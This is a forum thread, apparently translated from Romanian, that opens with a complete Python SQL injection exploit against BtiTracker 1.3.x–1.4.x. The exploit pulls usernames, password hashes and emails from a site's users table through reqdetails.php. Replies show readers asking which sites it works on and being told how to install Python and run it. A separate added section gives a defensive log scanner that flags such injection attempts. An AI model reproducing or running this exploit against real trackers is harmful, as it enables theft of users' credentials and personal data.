
BtiTracker 1.3.x – 1.4.x Exploit [Python]

Guest .TinKode.
Posted

#!/usr/bin/env python
#
################################################################################
# ______ ____ __ [ xpl0it ] #
#/\__ _\ /\ _`\ __/\ \__ #
#\/_/\ \/ ___\ \,\L\_\ __ ___ __ __ _ __ /\_\ \ ,_\ __ __ #
# \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \ #
# \_\ \__/\ \/\ \/\ \L\ \/\ __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ #
# /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\ \ \_\ \__\\/`____ \ #
# \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/ \/_/ \/_/\/__/ `/___/> \ #
# _________________ /\___/ #
# www.insecurity.ro \/__/ #
# #
################################################################################
# [ BtiTracker 1.3.X - 1.4.X Exploit ] #
# Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches #
# Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff #
################################################################################
# Because we care, we're security aware #
################################################################################

import sys, urllib2, re

if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
    print "==============================================================="
    print "= Discovered and coded by TinKode ="
    print "= www.InSecurity.ro ="
    print "= ="
    print "= Local Command: ="
    print "= ./isr.py [http://webshit] [ID] ="
    print "= ="
    print "==============================================================="
    exit()

if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]

shit = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"

url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
print "\n"
print "============================================="
print "================= InSecurity ================"
print "============================================="

html = urllib2.urlopen(url).read()
slobod = re.findall(r"--(.*):([0-9a-fA-F]{32}):(.*)--", html)
if len(slobod) > 0:
    print "ID : " + str(id)
    print "Username : " + slobod[0][0]
    print "Password : " + slobod[0][1]
    print "EMail : " + slobod[0][2]
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "Ai luat-o la gaoaza..."

#InSecurity.ro - Romania

Source: BtiTracker 1.3.X - 1.4.X Exploit
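
A defender-side check for the request this script sends, as an added example that is not part of the original post: it scans web access logs for reqdetails.php requests whose id parameter is not a plain integer. The log lines are constructed, and treating a legitimate id as digits-only is an assumption, as are the function names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /reqdetails.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,4+from+users+where+ID=1-- HTTP/1.1" 200 5301',
    '192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /tracker/reqdetails.php?id=1%20UnIoN%20SeLeCt%201 HTTP/1.1" 200 5301',
    '192.0.2.31 - - [01/Jan/2024:10:00:12 +0000] "GET /reqdetails.php?id=abc HTTP/1.1" 200 812',
    '192.0.2.31 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?page=union+select HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select|concat|from|where)\b|--|/\*", re.I)

def classify_id(value):
    """Assumption: a legitimate id is digits only; anything else is anomalous."""
    if re.fullmatch(r"\d+", value):
        return None
    return "sqli" if SQL_TOKENS.search(value) else "non-numeric"

def scan(lines):
    """Return (client, verdict, decoded id) for each suspicious reqdetails.php hit."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/reqdetails.php"):
            continue
        # parse_qs percent-decodes and turns '+' into a space before matching,
        # so encoded and mixed-case variants are classified the same way.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client:12} {verdict:12} id={value!r}")
```
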

Posted
And the password? :)

Later edit: I noticed it gets the password and the email too :-j .. does it work on any tracker? Even on Filelist? :o:O

It only works on trackers that use BtiTracker. Filelist is not one of them :)

Posted

Download this: http://downloads.activestate.com/ActivePython/releases/2.6.5.12/ActivePython-2.6.5.12-win32-x86.msi

Open cmd, go to the directory where you installed Python using "cd", copy the exploit into that directory, give it the ".py" extension, then run "python exploit.py". I think that's how it was with ActivePython.

Pff, but better leave it; first get the basics down, then move on to using exploits. There are tutorials on how to do this anyway.

Posted
Nytro, I understood almost nothing of what you said :D But anyway... now I have to learn the basics.

How did you figure that out? Was it hard to search Google for ".py extension" and see that it refers to the extension used by the Python programming language? After that you could have searched for "Python Programming Language" and learned the language, or at least taken a look at it.

Next time use Google and stop asking stupid questions! Use your brain.

And don't worry, I'm back.
